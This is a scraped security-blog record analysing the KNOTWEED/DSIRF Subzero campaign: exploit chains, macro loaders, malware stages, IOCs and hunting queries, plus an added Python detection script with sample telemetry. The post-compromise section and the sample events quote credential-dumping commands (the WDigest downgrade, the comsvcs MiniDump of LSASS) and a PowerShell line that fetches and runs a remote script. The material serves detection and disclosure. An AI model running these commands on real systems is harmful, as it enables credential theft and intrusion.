\n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware 
\nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| PassLib tool \nacrobatrelay[.]com| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n\n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** under the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. 
These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking_ - Detects multiple behaviors, including _Jumplump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module_ - Detects possible privilege escalation behavior associated with CVE-2022-22047; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities.\n * _KNOTWEED actor activity detected_ - Detects KNOTWEED actor activities.\n * _WDigest configuration change_ - Detects potential retrieval of clear-text passwords from changes to the _UseLogonCredential_ registry key.\n * _Sensitive credential memory read_ - Detects LSASS credential dumping via minidumps.\n * _Suspicious Curl behavior_ - Detects the use of Curl to download KNOTWEED tooling from public file shares.\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system.\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in this blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of the Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data 
sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources where the file size is abnormally large and the source is not a common one:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to plaintext credentials**\n\nThis query looks for the WDigest registry key being set to enable plaintext credentials:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their 
environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector 
offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mmpc", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-07-27T17:46:22", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple 
Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft's analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED's malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. 
The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services "_to multinational corporations in the technology, retail, energy and financial sectors_" and that they have "_a set of highly sophisticated techniques in gathering and analyzing information._" They publicly offer several services including "_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities_" and "_highly sophisticated Red Teams to challenge your company's most critical assets._"\n\nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft's communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. 
It's important to note that the identification of targets in a country doesn't necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED's Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump_ for the persistent loader and _Corelump_ for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or the Adobe Reader RCE portion of the exploit chain, but the victim's Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED's extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. 
Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we've seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache for an arbitrary process. This cached context is used the next time the process is spawned.\n\nCVE-2022-22047 was used in KNOTWEED-related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt's important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes such as those of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn't considered dangerous. 
Hence, these sandboxes aren't a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by 'DSIRF GmbH'.\n\nFigure 1: Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\nFigure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. 
Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\nFigure 3: Copying opcodes Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode's purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\nFigure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. 
As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. 
Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):

[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>)
---|---|---
[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>)
[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [SharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>)
[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>)
[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>)
[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)|

PassLib is a custom password stealer tool capable of dumping credentials from a variety of sources, including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.

#### Post-compromise actions

On victim systems where KNOTWEED malware had been used, a variety of post-compromise actions were observed:

 * Setting `UseLogonCredential` to "1" to enable plaintext credentials:
   * `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`
 * Credential dumping via `comsvcs.dll`:
   * `rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump`
 * Attempting to access emails with dumped credentials from a KNOTWEED IP address
 * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_
 * Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF

### KNOTWEED infrastructure connections to DSIRF

Pivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED's attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February 2020 and continues through the time of this writing.

RiskIQ next used passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company's own website) and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).

## Detection and prevention

Microsoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.

### Behaviors

_Corelump_ drops the _Jumplump_ loader DLLs to `C:\Windows\System32\spool\drivers\color\`. This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.

_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in `C:\Windows\System32\spool\drivers\color\`. Modifications of default system CLSID values should be monitored to detect this technique (e.g., the `HKLM\SOFTWARE\Classes\CLSID\{GUID}\InProcServer32` (Default) value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:

 * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = `%SystemRoot%\System32\ApplicationFrame.dll`
 * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = `%SystemRoot%\system32\propsys.dll`
 * {4590f811-1d3a-11d0-891f-00aa004b2e24} = `%SystemRoot%\system32\wbem\wbemprox.dll`
 * {4de225bf-cf59-4cfc-85f7-68b90f185355} = `%SystemRoot%\system32\wbem\wmiprvsd.dll`
 * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = `%SystemRoot%\System32\Actioncenter.dll`

Many of the post-compromise actions can be detected based on their command lines.
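The behaviors above (the five clean CLSID values, PE writes to the color profile folder, the WDigest and `comsvcs.dll` command lines, PowerShell and Curl fetching from the internet) can be turned into one offline check over endpoint telemetry. The Python below is an added example and is not Microsoft's code or one of the published hunting queries: the event schema (`type`, `cmdline`, `key`, `value_name`, `data`, `path`, `header`, `query`), the rule names and every sample event are constructed for this illustration. The baseline CLSID values come from the list above and the three C2 domains from the IOC table further down; the example goes slightly beyond the post in that the CLSID check also covers the user hive (`HKCU`) and the `MiniDump` rule also matches the export's ordinal form (`#24`).

```python
"""Offline detection checks for the KNOTWEED behaviours described in this
post, run over constructed sample telemetry. Added example, not Microsoft's
code: the event schema, rule names and sample events are assumptions."""
import re

# Clean (Default) InProcServer32 values on Windows 11 for the five CLSIDs
# Jumplump hijacks, as listed in the post; case-folded for comparison.
CLEAN_CLSID_VALUES = {
    "{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}": r"%systemroot%\system32\applicationframe.dll",
    "{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}": r"%systemroot%\system32\propsys.dll",
    "{4590f811-1d3a-11d0-891f-00aa004b2e24}": r"%systemroot%\system32\wbem\wbemprox.dll",
    "{4de225bf-cf59-4cfc-85f7-68b90f185355}": r"%systemroot%\system32\wbem\wmiprvsd.dll",
    "{f56f6fdd-aa9d-4618-a949-c1b91af43b1a}": r"%systemroot%\system32\actioncenter.dll",
}
# Folder Corelump drops the Jumplump DLLs into (lower-case substring match).
COLOR_DIR = "\\spool\\drivers\\color\\"
# Matches HKLM or HKCU ...\CLSID\{guid}\InProcServer32 on a lower-cased key.
CLSID_INPROC = re.compile(r"\\clsid\\(\{[0-9a-f-]{36}\})\\inprocserver32$")

# Command-line rules for the post-compromise actions listed in the post.
PROCESS_RULES = [
    ("wdigest_downgrade_cmdline",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*\\wdigest\b.*\buselogoncredential\b.*\s/d\s+0*1\b", re.I)),
    # MiniDump by export name or by its ordinal (#24).
    ("lsass_minidump_comsvcs",
     re.compile(r"\brundll32(?:\.exe)?\b.*\bcomsvcs(?:\.dll)?\s*,\s*(?:minidump|#24)\b", re.I)),
    ("powershell_remote_script",
     re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b.*https?://", re.I)),
    ("curl_download_to_file",
     re.compile(r"\bcurl(?:\.exe)?\b(?=.*https?://)(?=.*\s-[oO]\b)", re.I)),
]

def refang(indicator):
    """Turn the post's defanged 'example[.]com' notation back into a hostname."""
    return indicator.replace("[.]", ".").lower()

# C2 domains from the IOC table in this post.
C2_DOMAINS = {refang(d) for d in ("acrobatrelay[.]com", "finconsult[.]cc", "realmetaldns[.]com")}

def check_process(cmdline):
    """Return the names of every command-line rule the process matches."""
    return [name for name, rx in PROCESS_RULES if rx.search(cmdline)]

def check_registry(key, value_name, data):
    """Flag COM hijacks of the baseline CLSIDs and the WDigest downgrade."""
    hits = []
    k, v, d = key.lower(), value_name.lower(), data.lower().strip()
    m = CLSID_INPROC.search(k)
    if m and v in ("", "(default)"):
        if COLOR_DIR in d:
            hits.append("com_hijack_color_profile_folder")
        clean = CLEAN_CLSID_VALUES.get(m.group(1))
        if clean is not None and d != clean:
            hits.append("clsid_default_changed_from_baseline")
    if k.endswith("\\securityproviders\\wdigest") and v == "uselogoncredential" and d in ("1", "0x1"):
        hits.append("wdigest_plaintext_enabled")
    return hits

def check_file(path, header):
    """Flag a PE image (MZ header) written into the color profile folder."""
    if COLOR_DIR in path.lower() and header[:2] == b"MZ":
        return ["pe_dropped_in_color_profile_folder"]
    return []

def check_dns(query):
    """Flag lookups of a KNOTWEED C2 domain or any of its subdomains."""
    q = query.lower().rstrip(".")
    if q in C2_DOMAINS or any(q.endswith("." + d) for d in C2_DOMAINS):
        return ["knotweed_c2_domain"]
    return []

CHECKS = {
    "process": lambda e: check_process(e["cmdline"]),
    "registry": lambda e: check_registry(e["key"], e["value_name"], e["data"]),
    "file": lambda e: check_file(e["path"], e["header"]),
    "dns": lambda e: check_dns(e["query"]),
}

def scan(events):
    """Return (event index, detection name) pairs for every matching event."""
    findings = []
    for i, ev in enumerate(events):
        check = CHECKS.get(ev["type"])
        if check:
            findings.extend((i, name) for name in check(ev))
    return findings

# Constructed sample telemetry: events 4, 6 and 9 are benign and must not fire.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f"},
    {"type": "process", "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump"},
    {"type": "process", "cmdline": "powershell.exe -nop -c \"iex (New-Object Net.WebClient).DownloadString('https://gist.example.invalid/raw/run.ps1')\""},
    {"type": "process", "cmdline": r"curl.exe https://files.example.invalid/tool.bin -o C:\Users\Public\tool.bin"},
    {"type": "process", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Classes\CLSID\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\InProcServer32",
     "value_name": "(Default)", "data": r"C:\Windows\System32\spool\drivers\color\sample.dll"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32",
     "value_name": "(Default)", "data": r"%SystemRoot%\system32\propsys.dll"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "value_name": "UseLogonCredential", "data": "1"},
    {"type": "file", "path": r"C:\Windows\System32\spool\drivers\color\sample.dll", "header": b"MZ\x90\x00"},
    {"type": "file", "path": r"C:\Windows\System32\spool\drivers\color\sRGB.icm", "header": b"\x00\x00\x0cH"},
    {"type": "dns", "query": "acrobatrelay.com."},
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The registry check compares against a baseline rather than only looking for the color profile folder, so a hijack that points one of the five CLSIDs anywhere else is still surfaced, while a legitimate `propsys.dll` value passes. A real deployment would feed it process-creation, registry-set, file-create and DNS events from an EDR or Sysmon export in place of `SAMPLE_EVENTS`.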
Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`, and LSASS credential dumping via minidumps.

## Recommended customer actions

The techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:

 * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).
 * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.
 * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
 * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature, enabled by default, is on if the Group Policy setting for Macro Run Time Scan Scope is set to "Enable for All Files" or "Enable for Low Trust Files".
 * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _Note:_ Microsoft strongly encourages all customers to download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.
 * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.

## Indicators of compromise (IOCs)

The following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.

Indicator| Type| Description
---|---|---
78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA
0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA
441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware
cbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware
